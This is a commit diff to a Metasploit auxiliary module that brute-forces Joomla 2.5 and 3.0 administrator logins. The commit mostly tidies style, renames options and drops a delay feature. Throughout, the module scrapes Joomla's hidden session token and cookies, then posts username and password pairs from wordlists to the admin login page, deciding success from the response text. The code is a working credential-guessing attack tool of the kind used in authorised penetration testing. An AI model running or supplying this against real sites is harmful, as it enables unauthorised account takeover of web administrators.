implementation of the recommended changes

Author: root

modules/auxiliary/scanner/http/http_bruteforce_joomla.rb

@@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'           => 'BruteForce Joomla 2.5 or 3.0',
+      'Name'           => 'Joomla Bruteforce Login Utility',
       'Description'    => 'This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks',
-      'Author'         => [ 'luisco100[at]gmail[dot]com' ],
+      'Author'         => [ 'luisco100[at]gmail.com' ],
       'References'     =>
         [
           [ 'CVE', '1999-0502'] # Weak password Joomla
@@ -35,23 +35,20 @@ def initialize
           File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
         OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
           File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
-        OptString.new('AUTH_URI', [ false, "The URI to authenticate against (default:auto)", "/administrator/index.php" ]),
+        OptString.new('AUTH_URI', [ true, "The URI to authenticate against (default:auto)", "/administrator/index.php" ]),
         OptString.new('FORM_URI', [ false, "The FORM URI to authenticate against (default:auto)" , "/administrator"]),
-      	OptString.new('USER_VARIABLE', [ false, "The name of the variable for the user field", "username"]),
-      	OptString.new('PASS_VARIABLE', [ false, "The name of the variable for the password field" , "passwd"]),
-      	OptString.new('WORD_ERROR', [ false, "The word of message for detect that login fail","mod-login-username"]),
-      	OptString.new('WORD_ERROR_2', [ false, "Second option for the word of message for detect that login fail","login.html"]),
-        OptString.new('WORD_ERROR_DELAY', [ false, "The word of message for active the delay time" , "por favor intente de nuevo en un minuto"]),
-	      OptInt.new('TIME_DELAY', [false, 'The delay time ', 0]),
-        OptString.new('REQUESTTYPE', [ false, "Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)", "POST" ]),
+        OptString.new('USER_VARIABLE', [ false, "The name of the variable for the user field", "username"]),
+        OptString.new('PASS_VARIABLE', [ false, "The name of the variable for the password field" , "passwd"]),
+        OptString.new('WORD_ERROR', [ false, "The word of message for detect that login fail","mod-login-username"]),
+        OptString.new('REQUEST_TYPE', [ false, "Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)", "POST" ]),
         OptString.new('UserAgent', [ true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0' ]),
       ], self.class)
     register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
   end
 
   def find_auth_uri
 
-    if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
+    if datastore['AUTH_URI'] && datastore['AUTH_URI'].length > 0
       paths = [datastore['AUTH_URI']]
     else
       paths = %W{
@@ -66,15 +63,15 @@ def find_auth_uri
         'method'  => 'GET'
       }, 10)
 
-      next if not res
-      if res.code == 301 or res.code == 302 and res.headers['Location'] and res.headers['Location'] !~ /^http/
+      next unless res
+      if res.code == 301 || res.code == 302 && res.headers['Location'] && res.headers['Location'] !~ /^http/
         path = res.headers['Location']
         vprint_status("Following redirect: #{path}")
         res = send_request_cgi({
           'uri'     => path,
           'method'  => 'GET'
-        }, 10)
-        next if not res
+        })
+        next unless res
       end
 
       return path
@@ -85,20 +82,16 @@ def find_auth_uri
 
   def target_url
     proto = "http"
-    if rport == 443 or ssl
+    if rport == 443 || ssl
       proto = "https"
     end
     "#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
   end
 
   def run_host(ip)
-    if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "")
-      print_error("You need need to set AUTH_URI when using PUT Method !")
-      return
-    end
+
     @uri = find_auth_uri
 
-    time_delay = datastore['REQUESTTYPE']
     if ! @uri
       print_error("#{target_url} No URI found that asks for HTTP authentication")
       return
@@ -109,8 +102,7 @@ def run_host(ip)
     print_status("Attempting to login to #{target_url}")
 
     each_user_pass { |user, pass|
-      	datastore['REQUESTTYPE'] = time_delay
-	      do_login(user, pass)
+        do_login(user, pass)
     }
   end
 
@@ -126,37 +118,33 @@ def do_login(user='admin', pass='admin')
       return :next_user
     else
       vprint_error("#{target_url} - Failed to login as '#{user}'")
-    	if result == :delay
-		    print_status("Establishing one minute delay")
-		    userpass_sleep_interval_add
-      end
       return
     end
   end
 
   def do_http_login(user,pass)
-    
+
     @uri_mod = @uri
 
-    if datastore['REQUESTTYPE'] == "GET"
+    if datastore['REQUEST_TYPE'] == "GET"
+
+      @uri_mod = "#{@uri}?username=#{user}&psd=#{pass}"
 
-    	@uri_mod = "#{@uri}?username=#{user}&psd=#{pass}"
-        	
         begin
           response = send_request_cgi({
               'uri' => @uri_mod,
-              'method' => datastore['REQUESTTYPE'],
+              'method' => datastore['REQUEST_TYPE'],
               'username' => user,
               'password' => pass
               })
-	        return response
-    	  rescue ::Rex::ConnectionError
-      		vprint_error("#{target_url} - Failed to connect to the web server")
-      		return nil
-    	end
+          return response
+        rescue ::Rex::ConnectionError
+          vprint_error("#{target_url} - Failed to connect to the web server")
+          return nil
+      end
     else
 
-  	  begin
+      begin
 
         user_var = datastore['USER_VARIABLE']
         pass_var = datastore['PASS_VARIABLE']
@@ -167,60 +155,62 @@ def do_http_login(user,pass)
         uid, cval, hidden_value = get_login_cookie
 
         if uid
-          indice = 0
+          index_cookie = 0
           value_cookie = ""
-          #print_status("Longitud : #{uid.length}")
-          uid.each do |val_uid| 
-          	value_cookie = value_cookie + "#{val_uid.strip}=#{cval[indice].strip};"
-          	indice = indice +1
+
+          uid.each do |val_uid|
+            value_cookie = value_cookie + "#{val_uid.strip}=#{cval[index_cookie].strip};"
+            index_cookie = index_cookie +1
           end
+
           value_cookie = value_cookie
-          print_status("Value of cookie ( #{value_cookie} ), Hidden ( #{hidden_value}=1 )")
+          vprint_status("Target #{target_url},Value of cookie ( #{value_cookie} ), Hidden ( #{hidden_value}=1 )")
 
-          data  = "#{user_var}=#{user}&"
-          data << "#{pass_var}=#{pass}&"
-          data << "lang=&"
-          data << "option=com_login&"
-          data << "task=login&"
-          data << "return=aW5kZXgucGhw&"
-          data << "#{hidden_value}=1"
+          data  = "#{user_var}=#{user}&" \
+                  "#{pass_var}=#{pass}&" \
+                  "lang=&" \
+                  "option=com_login&" \
+                  "task=login&" \
+                  "return=aW5kZXgucGhw&" \
+                  "#{hidden_value}=1"
 
-          response = send_request_raw({
+          response = send_request_cgi({
             'uri' => @uri_mod,
-            'method' => datastore['REQUESTTYPE'],
+            'method' => datastore['REQUEST_TYPE'],
             'cookie' => "#{value_cookie}",
             'data' => data,
-            'headers' => 
-            	{
-              	'Content-Type'    => ctype,
-              	'Referer' => referer_var,
-              	'User-Agent' => datastore['UserAgent'],
-            	},
-          }, 30)
-
-          vprint_status("First Response Code : #{response.code}")
-
-          if (response.code == 301 or response.code == 302 or response.code == 303) and response.headers['Location']
-              
+            'headers' =>
+              {
+                'Content-Type'    => ctype,
+                'Referer' => referer_var,
+                'User-Agent' => datastore['UserAgent'],
+              },
+          })
+
+          vprint_status("#{target_url} -> First Response Code : #{response.code}")
+
+          if (response.code == 301 || response.code == 302 || response.code == 303) && response.headers['Location']
+
               path = response.headers['Location']
               print_status("Following redirect Response: #{path}")
 
               response = send_request_raw({
                'uri'     => path,
                'method'  => 'GET',
                'cookie' => "#{value_cookie}",
-                	}, 30)
+                  }, 30)
           end
 
           return response
         else
           print_error("#{target_url} - Failed to get Cookies")
-        end  
+          return nil
+        end
         rescue ::Rex::ConnectionError
           vprint_error("#{target_url} - Failed to connect to the web server")
         return nil
-  	  end
-    end   
+      end
+    end
   end
 
   def determine_result(response)
@@ -229,36 +219,28 @@ def determine_result(response)
     return :abort unless response.code
 
     if [200, 301, 302].include?(response.code)
-	
-      #print_status("Respuesta: #{response.headers}") 
-      #print_status("Respuesta Code: #{response.body}") 
-
-    	if response.to_s.include? datastore['WORD_ERROR_DELAY'] 
-     		return :delay
-    	else
-    		if response.to_s.include? datastore['WORD_ERROR'] or response.to_s.include? datastore['WORD_ERROR_2']
-    			return :fail
-    		else
-    			return :success
-    		end
-    	end
+
+      #print_status("Response: #{response.headers}")
+      #print_status("Response Code: #{response.body}")
+
+      if response.to_s.include? datastore['WORD_ERROR']
+        return :fail
+      else
+        return :success
+      end
+
     end
     return :fail
   end
 
-  def userpass_sleep_interval_add
-     sleep_time = datastore['TIME_DELAY']
-     ::IO.select(nil,nil,nil,sleep_time) unless sleep_time == 0
-  end
-
   def get_login_cookie
-    
+
     uri = normalize_uri(datastore['FORM_URI'])
-    uid             = ''
-    cval            = ''
+    uid = Array.new
+    cval = Array.new
     valor_input_id  = ''
 
-    res = send_request_raw({'uri' => uri,'method' => 'GET',})
+    res = send_request_cgi({'uri' => uri,'method' => 'GET'})
 
     if(res.code == 301)
       path = res.headers['Location']
@@ -269,42 +251,39 @@ def get_login_cookie
         }, 10)
     end
 
-    #print_status("respuesta Get login cookie: #{res.to_s}")
-    	
-    if res and res.code == 200 and res.headers['Set-Cookie']
-      #Idetificar formulario login y obtener la variable de validacion de session de Joomla	
-      if res.body and res.body =~ /<form action=([^\>]+)\>(.*)<\/form>/mi
-	
-    		#form = res.body.split(/<form action=([^\>]+) id="login-form" class="form-inline"\>(.*)<\/form>/mi)
-    		form = res.body.split(/<form action=([^\>]+) method="post" id="form-login"\>(.*)<\/form>/mi)
-    		#print_status("#{form[1]}")
-
-        if form.length == 1  #No es Joomla 2.5
+    #print_status("Response Get login cookie: #{res.to_s}")
+
+    if res && res.code == 200 && res.headers['Set-Cookie']
+      #Identify login form and get the session variable validation of Joomla
+      if res.body && res.body =~ /<form action=([^\>]+)\>(.*)<\/form>/mi
+
+        form = res.body.split(/<form action=([^\>]+) method="post" id="form-login"\>(.*)<\/form>/mi)
+
+        if form.length == 1  #is not Joomla 2.5
           print_error("Testing Form Joomla 3.0")
           form = res.body.split(/<form action=([^\>]+) method="post" id="form-login" class="form-inline"\>(.*)<\/form>/mi)
         end
 
-    		if not form
-    			print_error("Joomla Form Not Found")
-    			form = res.body.split(/<form id="login-form" action=([^\>]+)\>(.*)<\/form>/mi)
-    		end
-  		
-    		input_hidden = form[2].split(/<input type="hidden"([^\>]+)\/>/mi)
-    		#print_status("Formulario Encontrado #{form[2]}")
-    		print_status("--------> Joomla Form Found <--------")
-    		#print_status("Campos Ocultos #{input_hidden[7]}")
-    		input_id = input_hidden[7].split("\"")
-    		#print_status("valor #{input_id[1]}")
-    		valor_input_id = input_id[1]
+        unless form
+          print_error("Joomla Form Not Found")
+          form = res.body.split(/<form id="login-form" action=([^\>]+)\>(.*)<\/form>/mi)
+        end
+
+        input_hidden = form[2].split(/<input type="hidden"([^\>]+)\/>/mi)
+
+        print_status("--------> Joomla Form Found <--------")
+
+        input_id = input_hidden[7].split("\"")
+
+        valor_input_id = input_id[1]
       end
 
       #Get the name of the cookie variable Joomla
-      uid = Array.new
-      cval = Array.new
+
       #print_status("cookie = #{res.headers['Set-Cookie']}")
       res.headers['Set-Cookie'].split(';').each {|c|
-          if c.split('=')[0].length > 10 
-	          uid.push(c.split('=')[0])
+          if c.split('=')[0].length > 10
+            uid.push(c.split('=')[0])
             cval.push(c.split('=')[1])
           end
       }